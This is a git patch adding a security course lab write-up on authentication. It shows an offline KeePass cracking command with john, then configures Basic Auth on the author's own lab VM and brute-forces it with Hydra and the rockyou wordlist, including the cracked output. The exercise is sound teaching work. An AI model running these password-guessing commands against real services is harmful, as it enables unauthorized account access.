From d27cb057b9f2a1b79ffe80fa754ee58d99b0ec92 Mon Sep 17 00:00:00 2001 From: Manuel Thalmann Date: Fri, 15 Dec 2023 17:21:19 +0100 Subject: [PATCH] Solve `Authentication` task --- Lab 9 - Authentication/README.md | 73 ++++++++++++++++++++++++++++++++ 1 file changed, 73 insertions(+) diff --git a/Lab 9 - Authentication/README.md b/Lab 9 - Authentication/README.md index 8e0bc58..ab1a45d 100644 --- a/Lab 9 - Authentication/README.md +++ b/Lab 9 - Authentication/README.md @@ -27,3 +27,76 @@ john --wordlist=./rockyou.txt <(keepass2john steve_passwords.kdbx) ``` As a result, we get the password: `dancingdiva11195` + +## Online Password Cracking +This task is solved using the `heartbleed` VM from Lab 5. + +### Preparation +Look up IP address of `heartbleed` VM: + +```sh +ip address show +``` + +Add local DNS entry for `heartbleed` VM: + +```sh +echo '{ip address} heartbleed.ssb' | sudo tee --append /etc/hosts +``` + +Change Apache configuration to require login: + +```diff + + ServerAdmin webmaster@localhost + + DocumentRoot /var/www/heartbleed.ssb + ServerName heartbleed.ssb + ServerAlias www.heartbleed.ssb + SSLEngine on + SSLCertificateFile /etc/apache2/ssl/apache.crt + SSLCertificateKeyFile /etc/apache2/ssl/apache.key + ErrorLog ${APACHE_LOG_DIR}/error.log + CustomLog ${APACHE_LOG_DIR}/access.log combined ++ ++ ++ AuthType Basic ++ AuthName "Restricted Content" ++ AuthUserFile /etc/apache2/.htpasswd ++ Require valid-user ++ + +``` + +Create user login `test` with a password of your choice (the later the password occurs in `rockyou.txt`, the longer it takes to crack): + +```sh +sudo htpasswd -c /etc/apache2/.htpasswd test +``` + +Reload settings: + +```sh +service apache2 reload +``` + +### Start Cracking +Crack password using `Hydra`: + +```sh +hydra -l test -P ./rockyou.txt heartbleed.ssb https-get +``` + +Output: +``` +Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway). + +Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-12-15 17:15:46 +[WARNING] You must supply the web page as an additional option or via -m, default path set to / +[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344398 login tries (l:1/p:14344398), ~896525 tries per task +[DATA] attacking http-gets://heartbleed.ssb:443/ +[STATUS] 4625.00 tries/min, 4625 tries in 00:01h, 14339773 to do in 51:41h, 16 active +[443][http-get] host: heartbleed.ssb login: test password: vendetta +1 of 1 target successfully completed, 1 valid password found +Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-12-15 17:18:41 +```